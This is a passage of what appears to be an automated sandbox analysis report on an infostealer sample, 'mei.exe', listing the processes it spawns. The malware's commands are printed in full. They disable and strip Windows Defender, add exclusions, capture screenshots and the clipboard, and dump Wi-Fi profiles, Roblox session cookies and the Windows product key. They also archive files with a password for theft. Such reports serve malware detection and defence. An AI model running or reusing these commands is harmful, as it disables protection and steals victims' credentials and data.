Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll (8 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded (2 identical entries):
$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot
{
    public static List<Bitmap> CaptureScreens()
    {
        var results = new List<Bitmap>();
        var allScreens = Screen.AllScreens;
        foreach (Screen screen in allScreens)
        {
            try
            {
                Rectangle bounds = screen.Bounds;
                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                {
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                    }
                    results.Add((Bitmap)bitmap.Clone());
                }
            }
            catch (Exception)
            {
                // Handle any exceptions here
            }
        }
        return results;
    }
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()
for ($i = 0; $i -lt $screenshots.Count; $i++)
{
    $screenshot = $screenshots[$i]
    $screenshot.Save("./Display ($($i+1)).png")
    $screenshot.Dispose()
}
Source: C:\Users\user\Desktop\mei.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (12 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend (10 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All (2 identical entries)
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exeJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblag
uabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabg
aoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblag
uabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
